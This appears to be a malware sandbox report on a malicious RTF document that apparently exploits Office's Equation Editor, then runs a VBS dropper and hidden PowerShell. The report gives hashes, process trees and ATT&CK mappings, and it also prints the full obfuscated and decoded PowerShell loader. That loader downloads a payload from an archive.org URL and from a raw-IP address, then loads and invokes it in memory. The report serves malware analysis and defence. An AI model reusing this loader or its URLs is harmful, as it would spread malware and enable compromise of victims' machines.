55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040

General

Target

f31ba8351265a427efdf3b2d24ec6fab.rtf
Size

97KB
MD5

f31ba8351265a427efdf3b2d24ec6fab
SHA1

0dc5a1c62306ff5e581a15408edc7ea15433a6d2
SHA256

55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040
SHA512

1d70947a6fd849db0df28e79ed830a40355c569b4a89cf7e135deed8077f9089f5f4d3f61ea416537895204e24abf2fcc11406385e600d8410e349a1d06ffd20
SSDEEP

768:uUz5t/tJy06YV+K2IzBG3ZuE6dHscUgoFixYv9bqsRe:u4Zz4Y4zPJuLdHscUgiixa2

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

exe.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

flow pid process

4 2512 EQNEDT32.EXE
6 2608 powershell.exe
7 2608 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2744 powershell.exe
2608 powershell.exe

flow	pid	process
4	2512	EQNEDT32.EXE
6	2608	powershell.exe
7	2608	powershell.exe

pid	process
2744	powershell.exe
2608	powershell.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WINWORD.EXEEQNEDT32.EXEWScript.exepowershell.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2512 EQNEDT32.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2296 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2744 powershell.exe
2608 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2744 powershell.exe
Token: SeDebugPrivilege 2608 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2296 WINWORD.EXE
2296 WINWORD.EXE

pid	process
2512	EQNEDT32.EXE

pid	process
2296	WINWORD.EXE

pid	process
2744	powershell.exe
2608	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe

pid	process
2296	WINWORD.EXE
2296	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exeWINWORD.EXE

description	pid	process	target process
PID 2512 wrote to memory of 2136	2512	EQNEDT32.EXE	WScript.exe
PID 2512 wrote to memory of 2136	2512	EQNEDT32.EXE	WScript.exe
PID 2512 wrote to memory of 2136	2512	EQNEDT32.EXE	WScript.exe
PID 2512 wrote to memory of 2136	2512	EQNEDT32.EXE	WScript.exe
PID 2136 wrote to memory of 2744	2136	WScript.exe	powershell.exe
PID 2136 wrote to memory of 2744	2136	WScript.exe	powershell.exe
PID 2136 wrote to memory of 2744	2136	WScript.exe	powershell.exe
PID 2136 wrote to memory of 2744	2136	WScript.exe	powershell.exe
PID 2744 wrote to memory of 2608	2744	powershell.exe	powershell.exe
PID 2744 wrote to memory of 2608	2744	powershell.exe	powershell.exe
PID 2744 wrote to memory of 2608	2744	powershell.exe	powershell.exe
PID 2744 wrote to memory of 2608	2744	powershell.exe	powershell.exe
PID 2296 wrote to memory of 1372	2296	WINWORD.EXE	splwow64.exe
PID 2296 wrote to memory of 1372	2296	WINWORD.EXE	splwow64.exe
PID 2296 wrote to memory of 1372	2296	WINWORD.EXE	splwow64.exe
PID 2296 wrote to memory of 1372	2296	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f31ba8351265a427efdf3b2d24ec6fab.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2296

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1372

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2512

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\servicegoodfornaturalthinggood.vbS"
2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRQc0hvbWVbNF0rJHBTSE9NRVszNF0rJ1gnKSAoICgnY0dmaW1hZ2VVcmwgPSBBekVodHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyLycrJ2l0ZW1zL2RldGFoJysnLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3RlX1YuanBnIEF6RTtjR2Z3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2NHZmltYWdlQnl0ZXMgPSBjR2Z3ZWJDbGllbnQuRG93bicrJ2xvYWREYXRhKGNHJysnZicrJ2ltYWcnKydlVXJsKTtjR2ZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhjR2ZpbWFnZUInKyd5dGUnKydzKTtjR2ZzdGFydEZsYWcgPSBBekU8PEJBU0U2NF9TVEFSVD4+QXpFO2NHZmVuZEZsYWcgPSBBekU8PEJBU0U2NF9FTkQ+PkF6RTtjR2ZzdGFydCcrJ0luZGV4ID0gY0dmaW1hZ2VUZXh0LkluZGV4T2YoY0dmc3RhcnRGbGFnKTtjR2ZlbmRJbmRleCA9IGNHZmltYWdlVGV4dC5JbmRleE9mKGNHZmVuZEZsYWcpO2NHZnN0YXJ0SW5kZXggLWdlIDAgLWFuZCBjR2ZlbmRJbmRleCAtZycrJ3QgY0dmc3RhcnRJbmRleDtjR2ZzdGFydEluZGV4ICs9IGNHZnMnKyd0YXJ0RmxhZy5MZW5ndGg7Y0dmYmFzZTY0TGVuZ3RoID0gY0cnKydmZW5kSW5kZXggLSBjR2ZzdGFydEluZGV4O2NHZmJhc2U2NENvbW1hbmQgPScrJyBjR2ZpbWFnZVRleHQuJysnU3Vic3RyaW5nKGNHZnN0YXJ0SW5kZXgsIGNHZmJhc2U2NExlbmd0aCk7Y0dmY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhjR2ZiYXNlNjQnKydDb21tYW5kKTtjR2Zsb2FkZWRBc3NlbScrJ2JseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoY0dmY29tbWFuZEJ5dGVzKTtjR2Z2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG8nKydkKEF6RVZBSUF6RSk7Y0dmdmFpTWV0aG9kLkludm9rZShjR2ZudWxsLCBAKEF6RXR4dC5HREZSUlcvMzQzMy8wNy41NjEuNDguMy8vOnB0dGhBekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RVJlJysnZ0FzbUF6RSwgQXpFZGVzYXRpdmFkbycrJ0F6RSwgQXpFZGVzYXRpdmFkb0F6RSkpJysnOycpLnJlcExBY0UoKFtDaGFyXTY1K1tDaGFyXTEyMitbQ2hhcl02OSksW1NUcmlOR11bQ2hhcl0zOSkucmVwTEFjRSgoW0NoYXJdOTkrW0NoYXJdNzErW0NoYXJdMTAyKSxbU1RyaU5HXVtDaGFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PsHome[4]+$pSHOME[34]+'X') ( ('cGfimageUrl = AzEhttps://ia600102.us.archive.org/32/'+'items/detah'+'-note-v_202410/DetahNote_V.jpg AzE;cGfwebClient = New-Object System.Net.WebClient;cGfimageBytes = cGfwebClient.Down'+'loadData(cG'+'f'+'imag'+'eUrl);cGfimageText = [System.Text.Encoding]::UTF8.GetString(cGfimageB'+'yte'+'s);cGfstartFlag = AzE<<BASE64_START>>AzE;cGfendFlag = AzE<<BASE64_END>>AzE;cGfstart'+'Index = cGfimageText.IndexOf(cGfstartFlag);cGfendIndex = cGfimageText.IndexOf(cGfendFlag);cGfstartIndex -ge 0 -and cGfendIndex -g'+'t cGfstartIndex;cGfstartIndex += cGfs'+'tartFlag.Length;cGfbase64Length = cG'+'fendIndex - cGfstartIndex;cGfbase64Command ='+' cGfimageText.'+'Substring(cGfstartIndex, cGfbase64Length);cGfcommandBytes = [System.Convert]::FromBase64String(cGfbase64'+'Command);cGfloadedAssem'+'bly = [System'+'.Reflection.Assembly]::Load(cGfcommandBytes);cGfvaiMethod = [dnlib.IO.Home].GetMetho'+'d(AzEVAIAzE);cGfvaiMethod.Invoke(cGfnull, @(AzEtxt.GDFRRW/3433/07.561.48.3//:ptthAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzERe'+'gAsmAzE, AzEdesativado'+'AzE, AzEdesativadoAzE))'+';').repLAcE(([Char]65+[Char]122+[Char]69),[STriNG][Char]39).repLAcE(([Char]99+[Char]71+[Char]102),[STriNG][Char]36))"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
51e34ecf86528096ddea776e9025f963

SHA1
67f7bc75c30826832541c87989bbe928b3adf8d6

SHA256
8d8b1c96617491d67363995f4f99fd7b500d03f0fa35ba79b6a9f6434cdbff31

SHA512
1a97e0f39bb7a63afa560cb6d73f1f72dcc4c81c9eab6e0f9b71b83de791f5b0c0611176ce844d9711d6c8e20bef7f6d7836e5bc6d8438288ac0440d1e38a1a4

Download Submit
C:\Users\Admin\AppData\Roaming\servicegoodfornaturalthinggood.vbS

Filesize
190KB

MD5
b8c00ee73ed137a19e03920a03f80292

SHA1
d414493aaa6f1c167409a997f73b0f52fb04c0fa

SHA256
0cd60fbe4e65b7cbd036ee3e99507efa509970ab58c632bc49a4bcca2b05bd89

SHA512
fa7a2767f17ef3a4a4bfec94f0d3db894ad7d658c582612da295d16e6c970a088a7ee7079798a599847fd49c957f011143e37a5828362c63c0953285839ba3c2

Download Submit
memory/2296-0-0x000000002F621000-0x000000002F622000-memory.dmp

Filesize
4KB

Download
memory/2296-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2296-2-0x000000007140D000-0x0000000071418000-memory.dmp

Filesize
44KB

Download
memory/2296-22-0x000000007140D000-0x0000000071418000-memory.dmp

Filesize
44KB

Download
memory/2608-19-0x0000000005670000-0x00000000056C2000-memory.dmp

Filesize
328KB

Download
memory/2608-20-0x00000000056D0000-0x000000000570C000-memory.dmp

Filesize
240KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads